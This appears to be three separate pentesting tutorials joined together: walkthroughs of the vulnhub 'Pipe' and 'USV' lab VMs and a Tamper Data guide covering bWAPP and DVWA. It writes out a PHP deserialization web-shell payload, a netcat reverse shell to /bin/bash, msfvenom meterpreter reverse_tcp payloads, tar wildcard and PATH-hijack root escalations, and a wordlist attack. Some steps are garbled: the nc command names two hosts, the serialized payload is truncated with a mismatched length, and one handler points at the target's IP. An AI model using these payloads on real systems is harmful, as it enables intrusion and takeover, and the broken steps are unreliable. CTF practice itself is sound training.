Hack the Pipe VM (CTF Challenge)

Hello friends today we are going to solve another CTF challenge “PIPE” of the vulnhub labs design by Mr. Sagi. The level of this challenge is not so tough and its difficulty level is labelled as medium. Solving this lab will give you a good experience of penetration testing.

You can download it from here: https://www.vulnhub.com/entry/devrandom-pipe,124/

Penetrating Methodologies:

Network Scanning (Nmap,Netdiscover)

Abusing HTTP service (Burp Suite)

Let’s Begin!!

Start with netdiscover command to identify target IP in the local network, in my network 192.168.1.104 is my target IP, you will get yours.

netdiscover

Further let’s enumerate open ports and protocols information of the target’s network with help of nmap following command:

nmap -p- -A 192.168.1.104 --open

And from here we get open ports 22, 80, 111, 54073

Now we will open target IP in browser as port 80 is active. Here the website reflects off unauthorized message with a login page. On login window it written “the site says: index.php” which we will be using later on.

Now using burpsuite we are going to capture the cookies for login page by setting manual proxy of Firefox browser. It has intercepted data for login page. Here we will change HTTP-GET method into HTTP-POST.

As shown in the below image replace GET from POST/index.php and then forward the intercepted request.

Ok! To above step leads us to website which shows a PIPE picture and a link below it to get Show artist info.

As we cannot see anything else on this web page so we opened the page source code. It shows an accessible directory scriptz/php.js in its script content.

Now open target IP with /scriptz in browser, and you will notice some file or scripts are present here. Download both files for further enumeration.

So first we open php.js file here we found it is serializing some data and after that we open log.php.bak which works with the js file for serialization.

Then I search in Google and found Deserialization vulnerabilities in JS 

Now again returning to our original web page, and click on the link given below of the Pipe image and capture cookies that request in burp.

Select the parameter and send it for decoding in smart decoder, in the image below red highlighted text is decoded and result is shown in below window the code which is given in bottom window need to be altered so that we can upload our malicious code.

Now modify the parm with the following code for remote code execution and then forward the request.

O:3:"Log":2:{s:8:"filename";s:31:"/var/www/html/scriptz/shell.php";s:4:"data";s:60:" '; system($_GET['cmd']); echo '

'; ?>";}

Check your shell.php file is uploaded in that accessible directory.

Now we have uploaded shell it’s time to open it see what it gives us. As we have executed the code for cmd, we will type cmd in URL as well.

cmd=id

It will dump the id of current user i.e. www-data.

Now let’s try to spwan tty shell of the victim’s machine with help of netcat payload: nc 10.0.0.1 1234 -e /bin/bash 192.168.1.107 1234

Then start netcat listener and then execute the payload to spawn tty shell of victim’s machine.

nc -lvp 1234

As you can observe we have successfully compromised target machine and run the following command for gaining root access.

python -c 'import pty; pty.spawn("/bin/sh")'

Then we check for any cronjobs running on the system via cat command we can see a couple of cron jobs running which interest us. In /etc/crontab the script /usr/bin/compress.sh which is world readable now follow the below steps

cat /etc/crontab

cat /usr/bin/compress.sh

cd /home/rene/backup

ls

echo "chmod u+s /usr/bin/find" > test.sh

echo "" > "--checkpoint-action=exec=sh test.sh"

echo "" > --checkpoint=1

ls -al /usr/bin/find

touch raj

find raj -exec "/bin/sh" \;

Yuppie!! We got the root access.

At last open the flag.txt file and we have our flag.

Mission accomplished!

Web Penetration Testing with Tamper Data (Firefox Add-on)

One of the more popular hacker tools for Firefox is an add-on called Tamper Data. Tamper Data isn't a super complicated tool; it's merely a proxy, or go-between, that inserts it in-between the user and the web site or web application that they are browsing.

All those GETs and POSTs can be manipulated without the constraints imposed by the user interface seen in the browser.

It allows a person to tamper with the data being sent back and forth between the client and the server. When Tamper Data is started and a web app or website is launched in Firefox, Tamper Data will show all of the fields that allow user input or manipulation.

Hackers can then change a field to an "alternate value" and send the data to the server to see how it reacts.

Installing Tamper Data Add-On

Select the menu bar on the right end in Firefox. Click on Add-ons.

In the search bar field, search for Tamper Data add-on. Click on Install after installing the add-on, restart the Firefox Browser.

Displaying clear text password in Facebook using Tamper Data

Now I am trying to login into my Facebook account and when I typed my password I see the “password in dotted form" so I wanted to know whether the password typed is correct or not. Click on tools option from menu bar and select tamper data to capture the request

A pop will get open for tamper data click on start tamper which start capturing the ongoing request As we know that the username and password typed in the fields go through POST method. Now After that click on Login button to send the data through POST method.

When the request will send through browser to web server a pop up will appear, now hit Tamper, which will start capturing the sending request.

Now you can see from given image on the right half of Tamper Popup window it is showing the email and pass in clear text.

HTML Injection - Reflection POST method with Tamper Data

I have installed bWAPP on my wamp server running on localhost. It can be accessed through browser. Navigate to login page using url “localhost/bWAPP/login.php".

Login into web application server by typing bee: bug as login credential, now choose your bug” html injection-reflected (post)” from given list of bugs and click on hack.

In given text field enter first name: kunal and last name: bhal.

Before clicking Go; again start tamper data to change the field values. After that we can see the post values and now modify it to change the username of any person.

Now click on go and a dialog box get opened here click on tamper to capture the request.

Here you can read the captured request from given screenshot which has captured the first and last name kunal: bhal.

Tamper data allow you to modify the sent request of any user without his permission, so I am going to change first and last name given by user into first as first name and last as last name and then click on ok to forword the request.

Now you can see the request has been forward on the web server.

We successfully changed the username of the person; here you can see username to be "first last". Similarly you can use other modules with tamper data to exploit bWAPP.

File upload using tamper data

Now open the DVWA in your browser with your local IP as 192.168.1.102:81/DVWA and login with following credentials:

Username – admin

Password – password

Click on DVWA Security and set Website Security Level medium then select file upload vulnerability

Open terminal in kali linux and create php backdoor through following command

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.103 lport=4444 -f raw

Copy and paste the highlighted code in leafpad and save as with PHP extension as hacked.php.png on the desktop.

Load metasploit framework type msfconsole and start multi handler.

Now click to browse button to browse hacked.php.png file to upload.

Click on tools option from menu bar and select tamper data to capture the request.

Before clicking upload; again start tamper data and then click on upload; when the request will send through browser to web server a pop up will appear then, now hit Tamper, which will intercept the sending request.

From given screenshot you can see tamper data has capture the POST request now copy the selected data from POST DATA.

Paste POST DATA in a text file to change the extension of our upload. As you can read the name of file is hack.php.png but we want to upload a php file.

Now modify pasted POST DATA hacked.php.png into hacked.php then select and copy the complete data.

Now past the whole data of text file in the field given for POST DATA and click on ok

So here we have forward the modified request, now click on stop tamper.

From screenshot you can see our php is uploaded in uploads directory. Now copy the highlighted path /hackable/uploads/hacked.php where file is uploaded and run this path

http://192.168.1.102:81/DVWA/hackable/uploads/hacked.php in URL to execute it.

You will get victim reverse connection on metasploit.

msf > use multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.103

msf exploit(handler) > set lport 4444

msf exploit(handler) > run

meterpreter > sysinfo

I have got meterpreter session of victim PC

Hack the USV VM (CTF Challenge)

A new challenge for all of you guys!

This CTF is all about conquering flags coming across our way as we go further in our penetration testing of this lab.  All the flags should be discovered in form of: Country name Flag:[md5 hash]. The network interface of this virtual machine will take it’s IP settings from DHCP.

Download lab from here : https://www.vulnhub.com/entry/usv-2016-v101,175/

Let’s get started with our first step.

netdiscover

From this we get our target IP.

Target IP: 192.168.0.103

Now we will scan it with nmap which will give us all the open ports in particular lab for further penetration testing.

nmap –p- -A 192.168.0.103

This result shows that following ports are open 22 , 80 , 3129 , 3306 , 21211 and http proxy is used on port 3129.

 So now lets proceed with further penetration testing. Firstly we’ll go with ssh on port 22.

ssh 192.168.0.103

Ssh revealed a ascii Dragon with some strings and a base64 code written at bottom. Looking closer you’ll see something written on top AES-ECB.

By Google search we found out that there is a website called aesencryption.net where we can decrypt the base64 code we got in our last result. So we will decrypt that code with the given key in image by all this process we arrived at our 1st flag i.e ITALY FLAG

Ok so now let’s head towards second flag and for that we are going to open target IP in browser as port 80 is also open. Look at that. We got access forbidden. No result.

As we opened target ip in browser simultaneously we have captured the cookies through burp suite after setting the manual proxy in browser. When all this is done, right click on its window where intercepted data is fetched and a kind of action list will put on view further click to send to repeater.

Look over screenshot below you will find two panel left and right for request and response respectively. In the response window the highlighted text is our flag.

As this code is in base64 so we are going to use HackBar plugin in Mozilla firefox which is preinstalled or can be easily installed. Whoa decoding the code in it we got another flag which is our second flag i.e. CROATIA FLAG

Moving ahead, from our nmap result we got that http-proxy is set on port 3129 so we will set proxy setting for our target IP with port number 3129 as shown below.

Now try opening target IP in browser and wait for few seconds like 10 sec. The proxy setting did the trick and website reveals a single page with a changing banner of “WINTER IS COMING” and “ALL MEN MUST DIE”. Some of you may be aware of this but for those who do not know about this. It is Games of Thrones.

The site didn’t show much so I used nikto scanner with proxy to get some information about it which will be helpful in further testing.

nikto –h 192.168.0.103 –useproxy  http://192.168.0.103:3129

It reveals a wordpress login at /blog.

Ok!  Now open it in browser. Great, Games of Thrones notion is confirmed as Seven Kingdoms blog is shown.

Scrolling down in this site you can see that there is an interesting second post which shows ‘I have a message for you’. There is a highlighted option so jst try to open it in browser.

Awesome!!!! This reveals a message and a download link for a zip file. Interesting, so go ahead and download it.

Unzipping the file shows an image of a man with a bottle of perfume and a base64 encoded string at bottom.

Here we decrypt the code in the hackbar plugin which results in another flag. From this step we got our third flag i.e. PORTUGAL FLAG

 Now , returning to previous site there are several post which are all useless so just scroll down to see if there is something useful or not  and then comes a last post which is of our interest.

‘Protected: the secret chapter ‘

Oh! We have to provide a password to get through it. This one took some time and to spare your time I won’t go through my failures,

I have created dictionary of possible passwords which are nothing but some of the words in this whole page with the help of following command.

cewl –d 2 –m 5 –proxy_host 192.168.0.103 –proxy_port 3129 –w /root/Desktop/dict.txt http://192.168.0.103/blog/

From the list we get that password is ‘westerosi’

Using this password we came to another page which revealed another flag in base64 encoded string and below it some kind of images of an actress.

Now again decrypt it in and as a result we have our fourth flag i.e. PARAGUAY FLAG

Moving to one level up, from site we got another message that “the mother_of_dragons has a password which is in right front of your eyes”.

Knowing nothing about the eyes of actress I restored to google to see if I get any clue from there but no such luck.

I looked at the message again and it states ‘password which is in front of your eyes’

That’s the password of mother_of_dragons is ‘in front of your eyes’. But wait a minute where is this password is used.

We have ftp service running. So let’s try and get through it

ftp 192.168.0.103 21211

ls –al

get .note.txt

exit

cat .note.txt

bingo! Here that password is used. At the bottom result shows that children’s name is used for password. Again a password but this time it is used for wordpress login which we are going to use in coming steps.

Again I googled and found out she doesn’t had any children rather had 3 dragons named Drogon , Rhaegal and Viserion. So I put all these names into a file along with all possible combinations.

List is small so by entering each one the desired password could be find out.

Password is RhaegalDrogonViserion

Apply the credentials for wordpress and we are in!

Looking around the site I found the profile section which reveals the base64 encoded string for mother_of_dragons.

Like always decode the base64 code in HackBar and here we have another flag.

This is our fifth flag i.e. THAILAND FLAG

Now with only 2 flags left its time for shell access as we have wordpress.

Moving further, firstly make a php code through msfvenom which can be used to get the meterpreter session.

Msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 –f raw

Being admin of the site I am able to edit the theme. So I replaced the 404.php code of template in Viking theme with the above highlighted php code.

On the other side to get the meterpreter session open kali terminal and run multi handler. And for that type the following commands.

Use exploit/multi/handler

Set payload php/meterpreter/reverse_tcp

Set lhost=192.168.0.103

Set lport=4444

exploit

as we have meterpreter session ,now go to shell and type following commands

echo “ import pty; pty.spawn(‘ /bin/bash’)” > /tmp/asdf.py

python /tmp/asdf.py

cd /srv/http

ls

it shows a reward_flag.txt file so call it with cat command

cat reward_flag.txt

As a result we get a base64 encoded string.

Do not worry soon this decoding thing is going to over as we have sixth flag with this decoding. So as a result our sixth flag is MONGOLIA FLAG

Back to another file in above list of files i.e. winterfell_messenger .  We see its executable and owner is root. So run it with following command

./winterfell_messenger

Cat: /root/message.txt

It shows that it’s using cat command to read a file in the /root directory.

Using strings shows that cat command is being used; however it’s not using the full path to the program. From this we come to know that it will search for set PATH to run.

Now, we are able to update PATH by using export but first we need to find out the writable directory and for that we have used /tmp. In /tmp we will create an executable file named cat so it can be called by the winterfell_messenger program. This file will be running as root so we will use /bin/bash to call shell and to change the mode. Run the following commands.

echo “ /bin/bash” > /tmp/cat

chmod 777 /tmp/cat

echo $PATH

/usr/local/sbin: /usr/local/bin:/usr/sbin:/usr/bin

After this step we are going to update the PATH to remove the /tmp directory  we added. For this type the following commands.

Export PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

Now, we will go to the home directory of http to get the desired file . For that type

cd  /srv/http

ls

now  call the winterfell_messenger file by using given command.

./winterfell_message

id

Now go to root and there we have .flag.txt file.

Now running cat against .flag.txt we get a congratulations, a wolf made up of ascii characters and a base64 encoded string at the bottom. Commands are given below.

 cd /root

/usr/sbin/cat .flag.txt

Finally decoding in hackbar reveals seventh and last flag which is nothing but the SOMALIA FLAG

Whoola. We reached at the end and with this job is done. Hope you enjoyed it and obviously penetration skills are refreshed.